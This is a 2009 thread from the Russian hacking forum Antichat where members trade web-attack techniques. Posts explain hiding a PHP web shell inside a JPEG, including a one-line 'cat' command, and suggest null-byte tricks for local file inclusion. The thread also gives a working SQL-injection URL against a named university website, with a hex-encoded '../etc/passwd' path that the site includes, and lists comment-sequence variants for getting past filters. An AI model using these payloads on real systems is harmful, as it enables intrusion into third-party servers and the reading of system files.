
15.09.2009, 07:37
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
[QUOTE=Explоit]Я имео ввиду по умалчанию, я даже выделил это слово жирно/QUOTE]
|
|
|

24.09.2009, 16:32
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Ins3t
ATLANT_93, используйте WinHex.
Откройте ним вашу картинку, перейдите в конец (последнее значение - FF D9), замените FF D9 на 00 00, и после этих нолей вставне ваш php код, выбрав при этом формат добавляемых данных - ASCII.После вставленого кода напишите FF D9. Сохраните файл и все готово.
Поясни пожалуйста, что это за хренотень, и от чего, по твоему, это должно помогать.
ATLANT_93
По поводу шелла в картинке.
1 Метаданные
2 Просто переименовать расширение php файла
3 В конец файла
Пролезет или нет зависит ТОЛЬКО от проверок при загрузке, и манипуляции с FF D9 мне не понятны.
Gray_Wolf
Линк давай в тему, это не клуб экстрасенсов
|
|
|

24.09.2009, 16:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Ins3t
2jokester
Это не "хренотень" как вы выразелись, это как раз таки способ запихнуть код в картинку без использования метаданных.
ага а
$cat pic.jpg shell.php > poisoned.jpg
это способ не знать про хекс эдитор.
Сообщение от Ins3t
чем вас хекс эдитор не устроил?
Гвозди можно забивать микроскопом, но зачем?
Зачем делать магический ритуал из простой вещи?
Конечно применить хекс-эдитор это мегахакерский ход. Двигать байты, делать при этом серьезное лицо, это круто.
Последний раз редактировалось geezer.code; 24.09.2009 в 17:17..
|
|
|

24.09.2009, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Ins3t
2jokester
Это не "хренотень" как вы выразелись, это как раз таки способ запихнуть код в картинку без использования метаданных.
Я повторю свои вопросы более конкретно. Хотелось бы услышать ясный и чёткий ответ, если ты действительно понимаешь зачем это делать, а не просто тупо прочитал где-то (я даже знаю где) и теперь не задумываясь постишь это тут.
Вопросы:
Зачем я должен проделывать такие вещи с хекс эдитором?
Что КОНКРЕТНО это даёт?
Почему нужно менять именно эти байты?
Как это поможет при заливке картинки и что изменится если я этого делать не буду, а просто впихну код в конец никак не заморачиваясь с этими чудесами, или в метаданные, с которыми, кстати, заморачиваться не нужно, это элементарная операция?
Какую проверку это позволит обойти, из тех, что невозможно обойти предложенными мной вариантами?
|
|
|

29.09.2009, 12:39
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 7
С нами:
8827380
Репутация:
0
|
|
можно ли в mysql в подзапросе записать инфу в файл?
|
|
|

13.10.2009, 15:10
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Krist_ALL
подскажите плз
непойму как регулярки обмануть..
И откуда ты раздобыл такую увлекательную задачку..
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

21.10.2009, 13:52
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от DeluxeS
Помогите с чем то , помойму инклуд , LFI вроде.. Опыта совсем нет в этом
- где imyascripta: там расширение .php добавляется само...
Можно ли что то раскрутить?
Мало информации.
А вообще можно, нулл байт тебе в руки! (%00, %0A, %0D)
|
|
|

21.10.2009, 16:56
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Strilo4ka
а по поводу include что то не понятно мне пока...
Сообщение от AFoST
о ептыть тут еще инклуд есть
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr
в php-файле, который исполняется есть строчки примерно такие:
PHP код:
mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET);
далее
$pole2 = присваивается значение 2 поля.
после этого идёт локаьный инклуд файла
Мы запросом
PHP код:
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.
PHP код:
0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764
это равно
../../../../../etc/passwd
соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
Что непонятно - спрашивай.
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 21.10.2009 в 16:58..
|
|
|

21.10.2009, 19:13
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Strilo4ka
теперь догнал AFoST . только не 0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737377 64, а 2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 . Пробела нет перед 64. Оно наверно неправильно вставилось когда пост писался. Только что пропустил через bin2hex("../../../../../etc/passwd");. Кстати и что на ети данные дают интересно, как их использовать. что любой файл на хостинге прочитать можно это понятно. но это не GLOBAL INJECTION, толку от нее... Просто интересно для загального развития AFoST:
1. форум античата в длинных строках вставляет пробелы.
2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!
__________________
Появляюсь редко. Важные дела в реале.
|
|
|

21.10.2009, 19:13
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Strilo4ka
кстати а этот коментарий /* в запросе нельзя было использовать... Да выводит ошыбку, типа слеш служебный наверно. А че так??? да понятно что надо еще поросчихлять.
Хотя бы есть выбор:
--
{
%23
#
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|